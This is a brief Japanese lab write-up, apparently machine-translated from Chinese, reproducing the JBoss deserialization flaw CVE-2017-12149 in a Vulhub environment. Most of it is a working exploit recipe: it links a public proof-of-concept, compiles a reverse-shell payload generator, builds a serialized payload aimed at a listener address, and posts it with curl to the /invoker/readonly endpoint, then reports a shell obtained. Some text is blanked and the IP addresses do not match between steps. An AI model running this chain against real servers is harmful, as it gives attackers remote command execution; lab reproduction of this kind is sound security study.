【Vulhub】CVE-2017-12149 JBOSSアンチシーケンス化脆弱性再現


環境
ターゲット(Kali):http://192.168.0.11:8080/
オペレータ(Paroot):192.168.0.131
 

 
【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现_第1张图片
 
プロセス
POCのダウンロード:https://github.com/joaomatosf/JavaDeserH2HC
【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现_第2张图片
POCの使用方法:
              payload  :

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
  
 #    shell   ip   

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.135.100:1234 (IP:  )

curl           payload:
curl http://192.168.135.4:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 

いくつかの警告があったようですが、まだ使えます.
【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现_第3张图片
操作およびリスニングの開始

ターゲットにpayloadを送信
【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现_第4张图片
リバウンド成功shell
【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现_第5张图片
 
参考資料
http://www.mianhuage.com/695.html